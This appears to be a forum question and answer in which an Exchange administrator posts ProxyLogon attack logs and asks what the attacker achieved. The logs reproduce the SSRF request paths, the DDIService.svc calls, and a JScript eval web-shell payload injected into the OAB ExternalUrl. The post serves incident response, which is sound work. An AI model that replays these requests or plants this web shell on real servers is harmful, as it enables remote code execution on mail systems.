Last week, a server running Exchange Server 2013 was hit by the ongoing HAFNIUM-style attack.
We ran the Health Checker script provided by Microsoft and found that we needed to upgrade. We upgraded to Exchange Server 2013 CU23 and applied all patches, starting around noon on 2021-03-04. Apart from having to restart the Frontend Transport service manually, the upgrade succeeded. Since then, the same Health Checker script no longer lists any missing updates and lists the KB500871 patch.
We also ran the Test-ProxyLogon.ps1 script provided by Microsoft, which produced a log file whose name ends in Cve-2021-26855.csv.
That is only one of the four CVEs involved. Some guidance on interpreting this log file is provided, but not much, which is why I'm here.
The file lists various probes of autodiscover/autodiscover.xml, but also probes of ecp/proxyLogon.ecp and then of various DDI/DDIService.svc endpoints, which seems to be the worrying part. (There was no such activity after the patch.) Here is what the .csv file shows:
"2021-03-04T08:58:32.625Z","30b797e4-c47d-42a5-9367-511c90f92305","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","ExchangeServicesClient/0.0.0.0","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/autodiscover/autodiscover.xml?#","200"
"2021-03-04T08:58:33.969Z","44ebe2f7-47e4-468f-9f9a-47487faa7c95","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/mapi/emsmdb/?#","200"
"2021-03-04T08:58:37.031Z","3b0d1023-5972-477b-87e5-97936e34b120","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/proxyLogon.ecp?#","241"
"2021-03-04T08:58:51.547Z","56fc732f-d802-4d53-8960-0a39c3819e24","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory#","200"
"2021-03-04T08:59:07.344Z","7c2ee687-d1e5-45f1-8f03-7c99d46bb889","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
"2021-03-04T08:59:08.876Z","35530698-2402-415c-9717-0cd61709225d","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory#","200"
"2021-03-04T08:59:11.047Z","2f5e6b62-f04d-4850-8044-4c59d15fc1d3","666.666.666.666","mail.redacted.domain","/ecp/y.js","X-BEResource-Cookie","python-requests/2.25.1","ServerInfo~a]@EXCHSRVNAME.redacted.domain:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory#","200"
Here is what the server log under %EXCHANGEPATH%\V15\Logging\ECP\Server shows:
2021-03-04T08:58:49.906Z,EXCHSRVNAME,ECP.Request,S:TIME=539;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-ActiveSyncVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.063Z,EXCHSRVNAME,ECP.Request,S:TIME=147;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-AutodiscoverVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.156Z,EXCHSRVNAME,ECP.Request,S:TIME=78;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-EcpVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.235Z,EXCHSRVNAME,ECP.Request,S:TIME=77;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.438Z,EXCHSRVNAME,ECP.Request,S:TIME=201;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-OwaVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.516Z,EXCHSRVNAME,ECP.Request,S:TIME=67;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-WebServicesVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:50.610Z,EXCHSRVNAME,ECP.Request,S:TIME=80;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Get-PowershellVirtualDirectory.ADPropertiesOnly=$true;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:58:51.422Z,EXCHSRVNAME,ECP.Request,S:TIME=705;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;S:CMD=Pipeline.1|Get-MailboxRegionalConfiguration;S:REQID=;S:URL=/ecp/DDI/DDIService.svc/GetList?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=VirtualDirectory;S:EX=;S:ACTID=56fc732f-d802-4d53-8960-0a39c3819e24;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:07.219Z,EXCHSRVNAME,ECP.Request,"S:TIME=14186;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""i3QynV""],""unsafe"");}</script>''.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=0;S:BLD=15.0.1044.25"
2021-03-04T08:59:07.297Z,EXCHSRVNAME,ECP.Request,S:TIME=64;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=7c2ee687-d1e5-45f1-8f03-7c99d46bb889;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.547Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=1650;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OABVirtualDirectory.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.938Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=367;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-ExchangeServer.Identity=''EXCHSRVNAME''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:10.954Z,EXCHSRVNAME,ECP.Request,S:TIME=692;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:11.016Z,EXCHSRVNAME,ECP.Request,S:TIME=60;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''bd09f9b0-53da-4a02-a729-7808ab410f06''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=OABVirtualDirectory;S:EX=;S:ACTID=2f5e6b62-f04d-4850-8044-4c59d15fc1d3;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:14.579Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=3641;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Remove-OABVirtualDirectory.Force=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=0;S:BLD=15.0.1044.25
2021-03-04T08:59:23.391Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=8804;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=New-OABVirtualDirectory.WebSiteName=''Default Web Site''.Server=''EXCHSRVNAME''.Role=''ClientAccess''.InternalURL=''https://EXCHSRVNAME.redacted.domain/OAB''.Path=''C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
2021-03-04T08:59:23.454Z,EXCHSRVNAME,ECP.LongRunning,S:TIME=59;S:SID=432bcd4d-3b52-416f-b204-e3d38df0cc7e;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''EXCHSRVNAME\OAB (Default Web Site)''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=OrsNcBTX5U2VHYu8VQElRHVsiwd-4NgIo3aI3_vl85wADr4_ge3T19QV46uI-ZucvNcdQ-Fe-nk.&schema=ResetOABVirtualDirectory;S:EX=;S:ACTID=35530698-2402-415c-9717-0cd61709225d;S:RS=1;S:BLD=15.0.1044.25
As far as I can tell, this injected and exposed a web shell. But, according to the logs of ESET Mail Security (antivirus), the file in question (named RedirSuiteServerProxy.aspx) was intercepted when w3wp.exe (IIS) tried to retrieve it, and was deleted as the known trojan "JS/Exploit.CVE-2021-26855.Webshell.A". The file name also does not appear in any IIS access log. The IP address associated with these requests (anonymized as 666.666.666.666) does appear, but only in the lines corresponding directly to these requests, not in anything else that would indicate the web shell was actually reached and used.
I have run the recently updated MSERT / Microsoft Safety Scanner 1.0.3001.0, and its full scan reports no problems. Beyond that, I checked for the known event log events that the other three vulnerabilities may produce, but neither I nor the aforementioned script that checks for them could find any. I double-checked that no new users or groups appeared and that no existing users were moved into privileged groups, locally or in the domain. I also checked the various other indicators detailed on Microsoft's page, such as newly created .aspx files, .zip/.rar/.7z files in C:\ProgramData\ used for exfiltration, and so on.
With all of that in mind, my questions are: apart from creating a web shell (whose use the antivirus blocked immediately), did this attack do anything else? Does the absence of any sign of the other CVEs mean it never escalated to those steps? Is there anything else I need to investigate?
Answer 1
From my research, these vulnerabilities are used as part of an attack chain. The initial attack requires the ability to make an untrusted connection to port 443 on the Exchange server. Patching the Exchange server immediately is the best first step. Other interim options include protecting the server by restricting untrusted connections, or by setting up a VPN to isolate the Exchange server from external access. This mitigation only protects against the initial part of the attack; other parts of the chain can be triggered if the attacker already has access or can convince an administrator to run a malicious file.
This security update release fixes seven security vulnerabilities affecting Exchange Server. Four of them are known to have been used in limited, targeted attacks against on-premises Exchange servers.
In addition, the blog post "Web shell attacks continue to rise" may be helpful to you.